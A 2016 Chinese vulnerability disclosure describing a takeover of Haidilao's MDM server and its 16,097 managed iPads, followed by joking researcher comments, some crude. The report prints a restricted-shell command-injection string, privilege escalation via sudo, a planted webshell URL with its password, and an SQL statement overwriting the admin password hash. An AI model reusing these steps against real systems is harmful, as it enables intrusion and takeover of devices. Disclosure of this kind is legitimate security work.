海底捞某系统服务默认配置不当可控制海底捞16097台ipad（安装及删除应用/锁定设备/清除密码/发送通知/响铃等）

https://mdm.haidilao.com/mdm/admin/authenticate.do

用插件扫发现ssh弱口令

ssh admin

hostname `id`/g',cmd=id;`/bin/bash>&2`'

跳出沙盒

跳出沙盒后sudo su 直接获取root权限

写shell

https://103.240.244.6/mdm/f.jsp?z0=utf-8 tom

连接数据库：

管理员表：t_sys_user

密码没解出来 我们直接修改密码 登陆后再还原回去

UPDATE t_sys_user SET password='337772b3b5cdac00b9025c129e63ce38' where loginid='admin'

根据报表统计已激活的一共16097台设备 几乎都是ipad

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2016-03-10 17:06

厂商回复：

谢谢，我们已进行修复！

最新状态：

暂无

1. 2016-03-10 16:38 | 梧桐树下 ( 普通白帽子 | Rank:2557 漏洞数:403 | 一大波、洞、正在过来……)

   2

   帮我加两盘羊肉，谢谢！

   1# 回复此人

2. 2016-03-10 16:40 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

   1

   帮我订个位置吧

   2# 回复此人

3. 2016-03-10 16:40 | 土夫子 ( 普通白帽子 | Rank:507 漏洞数:88 | 看似山穷水尽，终将柳暗花明)

   1

   一盘鲜毛肚，两条热毛巾。水多加柠檬

   3# 回复此人

4. 2016-03-10 16:43 | 幻老头儿 ( 普通白帽子 | Rank:285 漏洞数:63 | 新手上路。)

   1

   装几个游戏，下次我过去可以直接玩……

   4# 回复此人

5. 2016-03-10 16:45 | 浩天 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈！躁起来！)

   1

   哥，我帮你把酸梅汤加满吧！

   5# 回复此人

6. 2016-03-10 16:48 | 土夫子 ( 普通白帽子 | Rank:507 漏洞数:88 | 看似山穷水尽，终将柳暗花明)

   1

   给我准备两个胸围38D的妹纸

   6# 回复此人

7. 2016-03-10 16:50 | 牛 小 帅 ( 普通白帽子 | Rank:1597 漏洞数:386 | bye)

   1

   @土夫子 出门右拐 WooYun: 速途网某站一个突破口导致（涉及几百名妹子/电话/qq/微信/女神照片） 欢迎您

   7# 回复此人

8. 2016-03-10 16:54 | North ( 路人 | Rank:19 漏洞数:6 )

   1

   加盘下滑，锅里加点汤

   8# 回复此人

9. 2016-03-10 17:04 | 李旭敏 ( 普通白帽子 | Rank:848 漏洞数:116 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

   1

   服务员，加水！

   9# 回复此人

10. 2016-03-10 17:04 | 专业种田 ( 核心白帽子 | Rank:1686 漏洞数:214 | 没有最专业的农民,只有更努力地耕耘..........)

    1

    我说怎么正吃着点不了菜了

    10# 回复此人

11. 2016-03-10 17:07 | Format_smile ( 普通白帽子 | Rank:640 漏洞数:217 | ···孰能无过，谁是谁非！)

    1

    我只想吃顿海底捞而已

    11# 回复此人

12. 2016-03-10 17:22 | North ( 路人 | Rank:19 漏洞数:6 )

    1

    我擦。 打雷了。

    12# 回复此人

13. 2016-03-10 17:26 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

    1

    上菜啊，饿死了！

    13# 回复此人

14. 2016-03-10 17:47 | 小胖子 ( 核心白帽子 | Rank:1888 漏洞数:156 | 不要患得患失，我羡慕你，但是我还是选择做...)

    2

    安装删除应用这个就厉害了，基数大影响就大，以前某APP推广，一个安装差不多5块，1.6*5，洞主你这是要发啊~

    14# 回复此人

15. 2016-03-10 18:20 | ’‘Nome ( 普通白帽子 | Rank:144 漏洞数:31 | 有事请发邮件，，垃圾邮...)

    1

    服务员，你过来下，怎么ipad老是响铃呢，咋办

    15# 回复此人

16. 2016-03-10 18:22 | 幻老头儿 ( 普通白帽子 | Rank:285 漏洞数:63 | 新手上路。)

    2

    @’‘Nome 奥，先生，没事的，你的只是会响铃，刚才隔壁桌的，都放＊片了。。。

    16# 回复此人

17. 2016-03-10 18:22 | 梧桐树下 ( 普通白帽子 | Rank:2557 漏洞数:403 | 一大波、洞、正在过来……)

    1

    修复这么快，我赌10块钱是后台弱口令。

    17# 回复此人

18. 2016-03-10 19:11 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

    1

    @幻老头儿 。。。不行，笑尿了

    18# 回复此人

19. 2016-03-10 21:27 | 幻老头儿 ( 普通白帽子 | Rank:285 漏洞数:63 | 新手上路。)

    1

    @疯狗 狗哥，请保持你的高冷啊。。。笑点辣么低

    19# 回复此人

20. 2016-03-10 21:40 | ’‘Nome ( 普通白帽子 | Rank:144 漏洞数:31 | 有事请发邮件，，垃圾邮...)

    1

    @疯狗 @幻老头儿 俩个猥琐男。。。。。。

    20# 回复此人

21. 2016-03-10 22:08 | 幻老头儿 ( 普通白帽子 | Rank:285 漏洞数:63 | 新手上路。)

    1

    @’‘Nome 先生，你的菜已经下单了，还有，你不许跟隔壁桌的换ipad。。。

    21# 回复此人

22. 2016-03-10 22:18 | ’‘Nome ( 普通白帽子 | Rank:144 漏洞数:31 | 有事请发邮件，，垃圾邮...)

    1

    @幻老头儿 卧槽，我tm才不换了我这也播放 * 片了

    22# 回复此人

23. 2016-03-10 22:33 | 幻老头儿 ( 普通白帽子 | Rank:285 漏洞数:63 | 新手上路。)

    1

    @’‘Nome 先生，可以的，但是请你只要看就行，别做其他事情啊

    23# 回复此人